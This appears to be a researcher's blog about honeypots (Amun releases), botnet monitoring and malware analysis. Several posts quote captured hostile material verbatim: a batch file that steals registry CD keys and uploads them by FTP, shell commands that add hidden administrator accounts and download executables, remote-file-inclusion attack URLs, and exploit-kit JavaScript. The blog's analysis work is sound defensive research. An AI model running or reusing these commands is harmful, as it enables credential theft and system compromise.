Virus Blog

After some bug fixes i decided that it is time for another file release, to keep up with the SVN version.
The tar archive can be downloaded from sourceforge as usual.

Changes in v0.1.9:

        - fixed wrong variable name in shellcode manager
        - fixed ftp_download core to allow login without password
        - modified plain ftp command shellcode detection
        - modified shellcode managers multiple file handling
        - modified furth shellcode decoder
        - modified ftp_nat_ip config parameter to accept dns names as well
        - modified match_plainFTP shellcode detector to accept decoded shellcode
        - modified vuln-ms08067 vulnerability
        - modified amun_smb_core
        - modified vuln-maxdb to ignore BitTorrent protocol requests
        - modified vuln-lsass to partly use amun_smb

I finally managed to finish my technical report on the Amun honeypot. I have tried to document all aspects of the software, so others can understand it. Maybe now it is more easy for others to contribute new modules. The PDF document is available here.

Abstract:
In this report we describe a low-interaction honeypot, which is capable of capturing autonomous spreading malware from the internet, named Amun. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities the payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local harddisc, for further analyses. As a result, we are able to collect at best unknown binaries of malware that automatically spreads across the network. The collected samples can for example be used to help anti-virus vendors improve their signatures.

We have just presented our work about monitoring the Waledac botnet at the European Conference on Computer Network Defense (EC2ND). The main focus of the paper is to get a more insight look at the botnet, that is supposed to be the successor of the Storm Worm botnet. By analyzing the communication infrastructure we managed to construct a fake Waledac instance, called Walowdac, to infiltrate the botnet and collect interesting information. The following image shows the number of bots counted during a single day in august 2009. More information about the approach is presented in the paper.

Abstract:
A botnet is a network of compromised machines under the control of an attacker. Botnets are the driving force behind several misuses on the Internet, for example spam mails or automated identity theft. In this paper, we study the most prevalent peer-to-peer botnet in 2009: Waledac. We present our infiltration of the Waledac botnet, which can be seen as the successor of the Storm Worm botnet. To achieve this we implemented a clone of the Waledac bot named Walowdac. It implements the communication features of Waledac but does not cause any harm, i.e., no spam emails are sent and no other commands are executed. With the help of this tool we observed a minimum daily population of 55,000 Waledac bots and a total of roughly 390,000 infected machines throughout the world. Furthermore, we gathered internal information about the success rates of spam campaigns and newly introduced features like the theft of credentials from victim machines.

This work is a collaboration with Ben Stock, Markus Engelberth, Felix Freiling, and Thorsten Holz.

I came across a posting on the blog of the Internet Storm Center about a little forensics contest. Although the puzzle is not very hard it is fun to investigate. If you are willing to send in your solution, there is also a prize to win. Winners are to be announced at Sec558 Network Forensics in San Diego, 9/16-9/18.

All you have to do is analyse a pcap file containing valuable information and answer the following questions:

1. What is the name of Ann's IM buddy?
2. What was the first comment in the captured IM conversation?
3. What is the name of the file Ann transferred?
4. What is the magic number of the file you want to extract (first four bytes)?
5. What was the MD5sum of the file?
6. What is the secret recipe?

I won't tell you any solutions here, but i tell you what tools i used to analyse the pcap file. So the number one tool when it comes to pcap is in my opinion still tcpdump. It gives you a quick overview about what happened. Use the appropriate filter options to dump the complete packet content.
This will help you to answer the first few questions. You can also use Wireshark. Another nice tool i came across while investigating the file is tcpxtract. This tool extracts files out of a pcap file. With the help of this tool you are able to extract the file that was transferred, and a bunch of other files =)

To further investigate the instant messenger session i used AimSniff. This tool extracts all kinds of instant messenger information from a given pcap. However, in this case it did not reveal anything that was not already discovered using tcpdump, but it substantiates the earlier foundings.

Another nice tool i used was Chaosreader. This tool generates a nice overview about who is communicating with who and what protocols are used. It extracts sessions and creates some small statistics.

Have fun with the challenge.

Although i was not able to finish everything i had planned for the new version, due to lack of time, i decided to release it anyway. So Amun v0.1.8 has a lot of fixes, modifications, and additional stuff. Feedback is always welcome. Documented changes are the following:

 Changes in v0.1.8:
        - added ulm shellcode handler
        - added bergheim shellcode handler
        - added langenfeld connectback2
        - added leimbach encoded tftp command detection
        - added pexalphanumeric b64encoded plain url detection
        - added new amun smb handler
        - fixed netdde vulnerability
        - fixed missing socket import for log-blastomat module
        - fixed reply function to send all bytes
        - fixed amun crash on already used port/address
        - fixed anubis submission module
        - fixed amun ftp NAT download
        - modified ftp_download_core to handle broken pipe on push command
        - modified vuln-http to serve images from folder
        - modified log-surfnet configuration to accept database port
        - modified vuln-arc to no reply
        - modified md5 to hashlib (deprecated warning)
        - modified popen2 to subprocess (deprecated warning)
        - removed conn= parameter prefix for asynchat.async_chat.__init__

As my colleague philipp already mentioned in his blog, our short paper about the visualization of malware behaviour is accepted at this years VizSec Workshop (11 Oktober, Atlantic City, NJ, USA).

We use transformed sandbox reports as a visualization basis. The recorded malware behaviour is displayed in different ways to aid malware researchers. I will blog more on this topic as soon as the workshop is over. 

Lukas from Glasblog released a new version of his webhoneypot called Glastopf yesterday. Several new modules have been implemented including a Twitter and an IRC module to log current statistics and attack information. A complete changeset can be found here.

A webhoneypot can be used to detect remote/local file inclusion attacks against current webapplications, such as phpmyadmin or roundcube webmailer. The honeypot simulates several vulnerable webapplications and extracts injected commands from the incoming requests. A request can either try to load another file from a remote server, that is already under the control of the attacker and execute it in the context of the webserver. In some cases these remotely loaded files contain IRC bots, that allow the attacker to take control over the attacked system. Other methods to compromise the system include the gathering of information about the running operating system and then include some local root exploit to take complete control over the server. 

While looking at different visualization tools, i came across circos. It creates really cool images, however the readability is not always the best. Following is an image presenting the top 25 countries of remote file inclusion attackers and the countries they attacked.

Lets see what other cool pictures we can generate from the data we have collected so far.

There is a great tutorial about how to setup an Amun honeypot using Debian Lenny at botnetz.com.
It is writte in german but it should be easy to guess what to do even if you don´t understand german.

The main parts are covered, so for those who want to get started it is very helpful. Thanks Duke for the great tutorial!

Update: An english version is available as of recently: here

While thinking about current remote file inclusion (rfi) honeypot solutions, we came to the conclusion instead of providing a honeypot for download, install and configuration for system administrators how about redirecting rfi requests to our already running honeypots.

If you are interested in sharing remote file inclusion requests hitting your webserver with us, you can use the following .htaccess file:

Options +FollowSymlinks
RewriteEngine on
RewriteCond %{QUERY_STRING} (.+=http:\/\/.+)
RewriteRule ^(.+)$ http://link.informatik.uni-mannheim.de/$1?%1 [R,NC]

The script checks for any variables in the GET request of a client, if an URL is given as parameter (RewriteCond). In case this is true the request is redirected to our webserver (RewriteRule). If you have any question, comments or suggestions do not hesitate to contact us.

i am thinking about a honeypot experiment to detect if attacks are really global or more local. For this reason i wrote a log-experiment module for the amun honeypot, for those willing to participate. The module writes a log file similar to the exploit.log but without the IP address of the attacked host, thus the information stored are the attacker IP, the destination Port, the vulnerability exploited and the download URL found in the shellcode.

For those who want to participate i would like you to install amun and the log module and collect data for a couple of weeks and then send me the created logs of the log-experiment module. Other honey
pot solutions are welcome as well, as long as they provide similar data.

To participate just write me an email to zero-q @ iname.com. It would be great if you can tell me at
 least the country where the honeypot is positioned, so i can determine how "global" the evaluation
will be in the end. Thanks.

After some updates and fixes it was time for another release (sourceforge download). So here are the changes:

 Changes in v0.1.7:
        - added new bindshell detection
        - added log-surfnet modul
        - added amun sql layout amun_db.sql
        - added vuln-ms08067 modul (milworm)
        - added bielefeld encoded URL detection
        - fixed linkbot dlident missing
        - modified currentSockets to store attackerId for log-surfnet
        - modified vuln-dcom to detect other exploit method
        - modified vuln-http POST request shellcode size to 530
        - modified download_core to handle errors

I recently stumbled across an article on the internet storm center about (v9/10) flash files (swf) which exploit your browser and install a World of Warcraft Password stealer. So lets take a closer look at what happens there. The URL which servers the SWF files is hxxp://www_svc7_com/1.html (don´t visit the site unless you know what you are doing).

What i did was a simple wget with disbaled user-agent string and retrieved the 1.html. This file contains some javascript code to determine the browser which is visiting and then includes another file in an iframe. Part of the script looks like this:

[...]
if(navigator.userAgent.toLowerCase().indexOf(\"msie\")>0)
{
  document.write(\'<iframe src=\"b.asp\" width=0 height=0></iframe>\');
} else {
  document.write(\'<EMBED src=\"dadongf.swf\" width=0 height=0>\');
}
[...]

Thus, if internet explorer is used, the b.asp file is included, otherwise the dadongf.swf. So lets take a closer look at the ASP file, it includes further javascript code to determine the flashplayer version running. At the time of this writting the ASP file checks if the major player version is 9 and then checks for the minor version and serves for different minor versions different SWF files. Thus, flashplayers of version 8 or earlier or version 10 and higher are not exploited. Following is a part of the ASP file: 

[...]
if (version['major'] == 9)
{                       
  document.getElementById('flashversion').innerHTML = "";
  // 9e
  if (version['rev'] == 115)
  {                            
    var so = new SWFObject("./9e.swf", "mymovie", "0.1", "0.1", "9", "#000000");
    so.write("flashcontent");
    document.write('<EMBED src="9e10.swf" width=0 height=0>');
  }
  // 9c/d
  else if (version['rev'] == 47)
  {
    var so = new SWFObject("./47.swf", "mymovie", "0.1", "0.1", "9", "#000000");
    so.write("flashcontent");                     
  }
[...]

After all the script checks for seven different minor versions of the flashplayer version 9 and serves a different SWF file accordingly. The next step is to download the SWF files and
see if we can find any malicious download URLs within. To retrieve the file we use wget again.

As already mentioned in the internet storm center article the swfdump tool does not work with SWF files of version 9 and greater so we take another tool called flasm. The tool can decompress
the compressed flash file for us. Thus we use the following command to decompress the SWF files:

       flasm -x 9e.swf

The resulting decompressed file can then be analyzed with the linux tool strings to retrieve any printable data. Following is the information we were looking for right from the start:
A URL to the actual malware binary, the World of Warcraft Password stealer.

       hxxp://vjd6_cn/lo/bigfots_exe

The Virustotal report for this file can be found at Virustotal. 

With the introduction of IP Version 6 getting closer and closer, the classical search, find and compromise tactics will surely fade away. Thus attackers will shift to more client side exploitation in order to compromise new machines. With this trend services like email, DNS servers, and network routing infrastructure will be the number one targets in the future. For this reason i expect SPAM to increase as it is the easiest way to reach new victims without much effort. Vulnerabilities in email clients or malicious attachments are already increasing in todays email traffic.

As IPv6 heavily relies on a working DNS infrastructure, attacks on DNS servers will increase as well. An attacker who controls a DNS server controls all clients using this server. With the help of compromised DNS servers attackers can direct victims to prepared websites exploiting vulnerabilities in browsers or harvest user credentials with the help of phishing sites. With the compromise of network infrastructure such as switches or routers things will even get worse. Thus it is of interest to develop tools to detect, monitor and understand attacks on DNS and network infrastructure as well as find a solution for the ever increasing SPAM messages filling the inboxes.

i have been playing around with a simple SSH Honeypot implementation in order to study a little more about Brute Force attacks on SSH Servers. The project is running for some time now and i want to present some of the data collected so far.

In a period of two month from july to september of this year a total of 143 different attackers tried to compromise the Honeypot. In my opinion this is not really much considering the fake SSH daemon was listening on a few thousand IP addresses.

The 143 attackers tried 9150 different usernames, the top 10 is presented in the following picture.

For the different usernames a total of 25973 different passwords were tried. The top 10 is presented in the next picture.

That´s it for now. I didn´t have the time yet to further investigate the collected data, but i post some more information as soon as i have more time.

Some time has passed since i blogged about the infiltrator script but here is an updated version.
I don't have a changelog, but this release fixes some bugs and provides some minor updates. It should be possible to monitor HTTP POST-based botnets as well.

Have fun: infiltrator-v0.3

For those that don't know what infiltrator is: it is a python script for quick and dirty botnet monitoring. no fancy GUI no extra comfort, just plain text =)

I found a small bug today. I missed to set the download identifier for two linkbot shellcodes. There is already a fixed version in the SVN.

If you want to fix it yourself change the following two lines in shellcode_mgr_core.py:
(they start with dlident = instead of what is mentioned below)

line 1047 should read:
self.resultSet['dlident'] = ...

line 1070 sould also start this way:
self.resultSet['dlident'] = ...

And another update to rishi. Some bugs have been fixed, so it should run better now. Files are available at http://sourceforge.net/projects/rishi/
Changelog looks like this:

Rishi v0.9.6:
        - fixed return values of the mysql module
        - modified JOIN regex check
        - modified queue sizes
        - free unused variables when possible

Finally. It took quite a while this time, because i thought getting internet at home should be quick and easy...well i am still waiting =) However, i the next release is ready for download either as tar.gz from sourceforge (http://sourceforge.net/project/showfiles.php?group_id=221628) or via subversion from sourceforge.

ChangeLog looks like this:

Changes in v0.1.6:
        - fixed submit-cwsandbox timeout issue
        - fixed submit-cwsandbox result url parsing
        - modified ftp download module
        - modified for-loops in shellcodemanager
        - modified range to xrange
        - added submit-joebox module thanx to the author of joebox and lukas from glasblog
        - added ipconfig command emulation

We recently came across an irc botnet with mostly german zombie machines. Our botnet detection sensor at RWTH Aachen University detected one infected host. We are currently monitoring the botnet using our infiltrator software and noticed about 188 different bots in the channel.

Several binaries have been advertised in the channel so far:

•  d7867796764fe9095d114f1a02b2662e IE.exe
• 4fcc736149b8ac46ee31d3763544e058 anita.exe
• 1059b51a5e4a702895060f8a4c8a8261 mof.exe

Acording to the traffic captured from the infected host and the sandbox reports of the binaries, the bot herder uses the botnet to play pennergame.de, some kind of browsergame...

We see a lot of T-Online, Arcor, and einsundeins customers being infected and interestingly according to the country abbreviation a lot of hosts from Enugu (Nigeria).

We are currently analysing several thound spam messages for research purposes and also doing some statistics. The one thing i like is the graph about what x-mailers were used for sending the spam. We have analysed 136.635 spam emails and here is what we discovered:

So if you want to stop more than 70 percent of spam in the internet, just go ahead and drop mails from outlook express =)

I am currently playing around with a webserver emulation modul for Amun, to catch remote file inclusion attacks on certain webapplications. thus i stumbled across the user-agent: Morfeus Fucking Scanner. it seems to be a software which scans webservers for vulnerable services, like mambo or cacti. following urls were tried at our honeypots:

/admin/business_inc/saveserver.php?thisdir=http://203.206.169.35/1.gif?/
/admin/business_inc/saveserver.php?thisdir=http://makina.org/sugarfree/1.gif?/
/board/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/board/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/cacti/include/config_settings.php?config[include_path]=http://makina.org/sugarfree/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/
/cal/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://makina.org/sugarfree/1.gif?/
/ical/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://makina.org/sugarfree/1.gif?/
/index.php?id=http://makina.org/sugarfree/1.gif?/
/index.php?option=com_custompages&cpage=http://203.206.169.35/1.gif?/
/joomla/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
//?mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/project/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/projects/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/user/soapCaller.bs
/webcalendar/tools/send_reminders.php?includedir=http://makina.org/sugarfree/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/

the file 1.gif which the attacker wants to include all the time, is a simple PHP script, just echoing some wise text:

echo ("Morfeus hacked you");

no need to get excited, though =)

Finally the next rishi release is available. It took a while to integrate the privacy features, another collector method is also available and the whole project moved to sourceforge.

The last changes:

Rishi v0.9.5:

• fixed exception handling in pypcap collector
• fixed queue handling in worker class
• added inclusion of external cc server list

Rishi v0.9.4:

• fixed changing to working directory before startup
• added pypcap collector method
• added privacy features (logging at certain points, anonymization)
• added checking nickname against uncommon bi-grams
• added logfile rotation
• increased default worker number to four
• moved update url to configuration file

I have been monitoring an IRC based botnet for a few days now, which spreads via instant messaging. It uses the common trick with image links and text like "hey is this you on this photo...". The interesting thing is, its a german botnet, as messages are send in german and the servers hosting the following malware file are located in germany.

The last update link "hxxp://xxx.myphotos.cc/image.php?=" points to a file 149K in size and a md5 hash equal to "bc800528e106916fe8a0cd4d91dc0cc4". To get some more information we ran the file on a vmware host and captured the network traffic. 

This binary does not update the IRC bot, but tries to retrieve its commands via HTTP from a host named "httpbot.xxx.cx". This host redirects the request to the following URL: "hxxp://xxx.bo.funpic.de/x.php?=/cmd.bat". The server sends the cmd.bat file in reply, which contains the following commands:

if exist %TEMP%\k3y (goto started) else (goto run)
:run
set data=%computername%_%random%.txt
echo tmp_dbg>> %TEMP%\k3y
ECHO ===========>> %data%
ECHO   CD KEYs>> %data%
ECHO ===========>> %data%
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Electronic Arts\Electronic Arts\Crysis\ergc" crysis
type crysis >> %data%
del crysis
reg export "HKEY_LOCAL_MACHINE\Software\Unreal Technology\Installed Apps\UT2003" ut03
type ut03 >> %data%
del ut03
reg export "HKEY_LOCAL_MACHINE\Software\Unreal Technology\Installed Apps\UT2004" ut04
type ut04 >> %data%
del ut04
reg export "HKEY_LOCAL_MACHINE\Software\id\Quake 4" q4
type qt >> %data%
del q4
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\VirtualDJ" vdj
type vdj >> %data%
del vdj
Echo Open xxx-xxx.de 21>>a
Echo web6>>a
Echo 123456>>a
Echo Binary >>a
Echo cd /httpdocs/log >>a
Echo PUT %data%>>a
Echo Quit>>a
Echo ftp.exe -s:a>>r.bat
ECHO del a>>r.bat
ECHO del %data% >>r.bat
ECHO del r.bat>>r.bat
r.bat

As one can see from the commands, the malware tries to extract CD Keys from the Windows registry and upload it to a ftp server. Currently it looks for keys from the following software: Quake4, Crysis, Unreal Tournamen 2003 and 2004 and Virtual DJ.

The new release is available here. Changes are as follows:

Changes in v0.1.5:

• fixed reload config missing return value
• fixed connectback config_dict variable not global error
• added shellcode decoder for alpha2 zero tolerance shellcode
• added new vulnerability modul for HP OpenView exploit
• added submit-cwsandbox module
• modified remove bindport from list after sending local quit
• modified remove ftp data port from list after sending local quit

Yesterday our honeynet was hit by an attacker exploiting the IBM Lotus Sametime buffer overflow. The service is running on TCP port 1533 and is vulnerable to  oversized urls
(http://securityvulns.com/news/IBM/LotusSametime.html)

I set up the analyser modul of amun to listen on this port for incoming requests and yesterday we got first results:

exploit 85.214.79.120:3384 -> xxx.xxx.51.84:1533
(ANALYZER Vulnerability: cbacks://85.214.79.120:5559/)

Fortunatly the shellcode is already recognized. The attacker injected shellcode causing the victim to connect back to the attacker and spawn a shell. 

I modified my infiltrator script to monitor POST based HTTP Bots. I am currently monitoring the Black Energy Botnet i found yesterday.

Commands have changed since the last visit:

base64: ['10;2000;10;0;0;30;100;3;20;1000;2000#flood http
www.igra3k.ru,www.moneymakergroup.com,www.mycashforum.com,www.dreamteammoney.com,
www.invest-n-surf.net,www.autosurfnavigator.com,www.vip-globalmarketingsolutions.com#6#']

base64: ['10;2000;10;0;0;30;100;3;20;1000;2000#wait#8#']

base64: ['10;2000;10;0;0;30;100;3;20;1000;2000#flood http
www.moneymakergroup.com,www.mycashforum.com,www.dreamteammoney.com,
www.invest-n-surf.net,www.autosurfnavigator.com,www.vip-globalmarketingsolutions.com#6#']

base64: ['10;2000;10;0;0;30;100;3;20;1000;2000#flood http
www.russiancasino.ru,taxi-ufa.ru#8#']

I recently stumbled across some interesting log lines in our quarantine webserver logs:

15:49:19.348824 IP xxx.xxx.101.24.3989 > 124.217.249.240.80
POST /h0tbe1by/stat.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: activeprotect.cn
Content-Length: 38
Pragma: no-cache

id=xMAHAJANVA_33E529BB&build_id=2F5C73

This looks pretty interesting, a POST to a funny directory ... strange. Now lets see what the server replied:

15:49:19.729110 IP 124.217.249.240.80 > xxx.xxx.101.24.3989HTTP/1.1 200 OK
Date: Fri, 23 May 2008 13:49:19 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Connection: close
Content-Type: text/html

MTA7MjAwMDsxMDswOzA7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI2Zsb29kIGh0dHAgd3d3LjE0ZGF5cy1oaXRzLX
N1cmYubmV0LG1vbmV5bWFrZXJncm91cC5jb20sd3d3LnRhbGtnb2xkLmNvbSBmb3J1bS9p
bmRleC5waHAjOCM=

Yesterday evening our amun honeypots got hit by an attacker exploiting the HP OpenView vulnerability. The attack came from a host located in the netherlands.

Shellcode is about 1.5KByte in size and is encoded using ALPHA 2, some alphanumeric shellcode encoding mechanism, just like the one from the milworm exploit linked above.

Amun does not yet simulate that vulnerability but had the port added to the analyzer modul, thus i received all necessary information. 

Next release is ready to download. Changelog looks as follows:

Changes in v0.1.4:

• fixed ftp download module to send requests one by one
• fixed manual analysis option to work again after last update (missing parameter)
• added new vulnerability modul for Helix server v11.0.1 exploit
• modified ftp shellcode decoder to find all download files
• modified submit modules to python new-class style
• modified logfiles to rotate at midnight
• added blocking of successfull exploit ips
• added queue of last stored binaries to reduce disk io when checking for already stored files
• added initial stage to iis vulnerability
• moved broken download checking out of submit modules

Today, we were able to identify an infected system, validating email adresses before sending out some few SPAM messages. This behaviour is probably nothing new, but i haven't seen it before.

So what the infected machine does, it connects to a single mailserver, in this case it was yahoo mail and inititates the email sending process.That means, it sends MAIL FROM with a random address followed by 3-7 random recipients (RCPT TO). For each recipient the mailserver returns either OK or not. Afterwards the infected hosts sends a RSET to reset the the mail process and starts from the beginning.

Thus, traffic looks like this:

• -> MAIL FROM:<Juana_Blanco@stny.rr.com>
• -> RCPT TO:<dbrant_07@yahoo.com>
• <- 250 recipient <dbrant_07@yahoo.com> ok
• -> RCPT TO:<dbpoet1969@yahoo.com>
• <- 250 recipient <dbpoet1969@yahoo.com> ok
• [...]
• -> RSET
• <- 250 reset ok
• -> MAIL FROM:<OdessaHutchins89@catcha.com>
• [...]

And here comes another one =) This time more bug fixes and less new features. Get it here.

Changes in v0.1.3:

• fixed tftp download packet ACK reply to correct port
• fixed setting download identifier for tftp downloads
• fixed properly checking blocked hosts
• fixed double closing of bindports, http, connback, and ftp downloads
• added initial stage to tivoli vulnerability
• added drop privilege function to run as non-root user
• added extended logging option
• added new shellemulation class to handle bindport and connectbackshell
• added new logfile for shellemulator
• modified submission modules to receive notficiation if file already exists
• modified bindport to submit shellcode to shellcode manager 

The next Amun release is now available. Things that have changed:

Changes in v0.1.2:
    - fixed delete existing connection function
    - fixed amun_config_parser to parse empty variables and set to none
    - fixed amun_config_parser to allow comment of modules with '#'
    - added submit-anubis modul
    - added different options for defining the ip(s) to bind to
    - added nat ip option for ftp downloads
    - added new plain ftp download regex found in symantec exploit
    - added support for multiple file ftp downloads
    - added change directory functionality for bindport and connectbackshell
    - added change to working directory before startup
    - added handle_expt() to bindport module
    - modified default reply size to 64
    - modified vuln modules which need bigger default reply size
    - modified call of functions to provide all parameters
    - modified handle_expt() in ftp_download from close to pass

Lately at a botnet far far away ...

PRIVMSG #a#s#b :u have bots ?
PRIVMSG #a#s#b :yes
PRIVMSG #a#s#b :more then 1k
PRIVMSG #a#s#b :haha
PRIVMSG #a#s#b :lol
PRIVMSG #a#s#b :nice
PRIVMSG #a#s#b :right now on my sever 1458 bot
PRIVMSG #a#s#b :ghand ara bhenchod
PRIVMSG #a#s#b :Current local users: 170 Max: 535
PRIVMSG #a#s#b :Current global users: 170 Max: 535
PRIVMSG #a#s#b :is my server
PRIVMSG #a#s#b :170 :P
PRIVMSG #a#s#b :what source have ?
PRIVMSG #a#s#b :lol only 170
PRIVMSG #a#s#b :PRivate
PRIVMSG #a#s#b :give me your src
PRIVMSG #a#s#b ::D
PRIVMSG #a#s#b :Why ?
PRIVMSG #a#s#b :this is private
PRIVMSG #a#s#b :i buy in 10 $
PRIVMSG #a#s#b :haha lol
PRIVMSG #a#s#b :give me your src end i will give yo root :D
PRIVMSG #a#s#b :i dont need root.
PRIVMSG #a#s#b :oks
PRIVMSG #a#s#b ::D
PRIVMSG #a#s#b :help me
PRIVMSG #a#s#b :y u laugh
PRIVMSG #a#s#b ::D
PRIVMSG #a#s#b :for un src
PRIVMSG #a#s#b ::D
PRIVMSG #a#s#b :where are u from
PRIVMSG #a#s#b :?
PRIVMSG #a#s#b :malaysian
PRIVMSG #a#s#b :aha
PRIVMSG #a#s#b :u
PRIVMSG #a#s#b :oki
PRIVMSG #a#s#b :albania
PRIVMSG #a#s#b :where r u from
PRIVMSG #a#s#b :albania
PRIVMSG #a#s#b :man
PRIVMSG #a#s#b :ok
PRIVMSG #a#s#b :yes
PRIVMSG #a#s#b :this src what is ?
PRIVMSG #a#s#b :is
PRIVMSG #a#s#b :your
PRIVMSG #a#s#b :exe ?
PRIVMSG #a#s#b :give links
PRIVMSG #a#s#b :hey
PRIVMSG #a#s#b :u are here
PRIVMSG #a#s#b :give your exe

i was in the need of some pcap files of irc bot infected machines, unfortunatly they are not so easy to get. thus, i decided to write a little tool which automatically generates pcap traces for submitted samples.

the tool is devided into two parts. the first part is a little windows tcp server, capable of receiving binary data and executing it. this part runs in a virtual machines running windows as operating system. the second part is a short python script running on a linux host outside the virtual machine. it takes binary files from a directory and transmits them one by one to the virutal machine. while the virtual host runs the submitted binary the python script captures the network traffic and constructs the pcap file. after a predefined timeout, the python scripts sends a revert to snapshot to the virtual machine and sends the next binary.

as a result i have a little tool to automatically construct pcap files of infected machines running for a configurable time. currently i am constructing pcaps of malware running 5 minutes on the virutal machine.

The vulnerability in the Symantec Anti-virus/Client Security software listing on port 2967 is activly exploited as we can determine from the Amun honeypot log files.

Different hosts frequently exploit our emulated vulnerability and inject shellcode which instructs the client to connectback to the attacker, presenting a shell for further commands:

exploit 222.133.xxx.xxx:1786 -> xxx.xxx.129.106:2967 (SYMANTEC: cbacks://222.133.xxx.xxx:6000/)

Commands entered on in the shell instruct the victim to download additionally files via ftp:

net stop sharedaccess
net user guest active:yes
net user guest !!!@@@QQQaaa
net localgroup administrators guest /add
net user sb$ sb /add
net localgroup administrators sb$ /add
echo open 124.234.xxx.xxx>>ftp.txt
echo sb>>ftp.txt
echo sb>>ftp.txt
echo bin>>ftp.txt
echo get sx.exe>>ftp.txt
echo get qq.exe>>ftp.txt
echo get 3389.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
sx.exe
qq.exe
3389.exe -o 3389
3389.exe -r

The next Amun release is now available. Things that have changed:

Changes in v0.1.1:
	- fixed amun request handler to close finished connections
	- fixed submit-md5 modul to write in binary mode
	- fixed connectbackshell loading shellcodemanager correctly
	- fixed connectbackshell replying with prompt
	- fixed bindport replying with prompt
	- fixed http download to accept few bytes if download already started
	- added new unencrypted bindshellcode used to exploit the VERITAS vulnerability
	- added new plain tftp download regex found in asn1 exploit
	- added new vuln modul for port 2380
	- added ftp port range configuration
	- added debug option logging local ip exploits
	- added new stage shellcode for vuln-pnp module
	- added minimum shellcode size for vuln-upnp to avoid emule
	- added logging module for syslog
	- added logging module for email
	- added utility for quick shellcode checking (checkCode.py)
	- update regular expression ftp plaintext detection
	- modified bindport socket close behaviour
	- modified default timeout values in amun.conf
	- modified error message for not connected transports
	- modified http shellcode to allow urls without port

And once again i stumbled across an interesting bot. This one tends to send out Spam. The infected host contacts a webserver running on 208.72.xxx.xxx to receive its commands. The GET request looks as follows: /outtask/urlTask8_c_3_no_sbl.txt?id=5A7766D4AEC8C19E051A.

The server replies with a list of different URLs like this:
10
602|http://x/outtask/tasks/tasks_task_602_letter_1192013242.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|
635|http://x/outtask/tasks/tasks_task_635_letter_1192013254.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|
636|http://x/outtask/tasks/tasks_task_636_letter_1192013259.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|
637|http://x/outtask/tasks/tasks_task_637_letter_1192013263.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|
641|http://x/outtask/tasks/tasks_task_641_letter_1192013267.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|
642|http://x/outtask/tasks/tasks_task_642_letter_1192013271.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|

The first URLs probably refer to the text the Spam message should contain. As the server wasn't reachable anymore, i could not verify this. However, if you take a look at the second URL in line, you receive some interesting results:
info@davidnau.com xxx.xxx.xxx.xxx, xxx.xxx.xxx.xxx, xxx.xxx.xxx.xxx
info@davidnavas.com xxx.xxx.xxx.xxx
info@davidnealmuir.com xxx.xxx.xxx.xxx
[...]

So this are e-mail addresses followed by a comma separated list of mailservers, who accept outgoing mail for the domains.

i came across a nice rogue ftp server while examinig a host trying to exploit the simulated trend micro exploit from may 2007 on my amun honeypot:

220-##################################################
220-##################################################
220-##| o0o-======= a slb33 production =======-o0o |##
220-##|____________________________________________|##
220-##################################################
220-##################################################
220-##| o0o-============= Rules ==============-o0o |##
220-##| |##
220-##| Don't Hammer! |##
220-##| Don't Rehack! |##
220-##| Don't Repost or Share the Info! |##
220-##| Don't Rescan This Range! |##
220-##| Enjoy the Stro! |##
220-##|____________________________________________|##
220-##################################################
220-##################################################
220-
220-::::::::::::::::::::::::::::::::::::::::::::::::::
220-::::::::::::::::::::::::::::::::::::::::::::::::::
220-
220-##################################################
220-##################################################
220-##| o0o-========== Server Stats ==========-o0o |##
220-##| |##
220-##|The Local time is 04:06:20 |##
220-##|Average Throughput 0.000 Kb/sec |##
220-##|In Use 0.000 Kb/sec |##
220-##|Users Connected 1 |##
220-##|Uploaded 0 KBps |##
220-##|Leeched 0 KBps |##
220-##|Disk Space 35464.12 |##
220-##|Uptime 45 Days 14 Hours. |##
220-##|____________________________________________|##
220-##################################################
220-##################################################

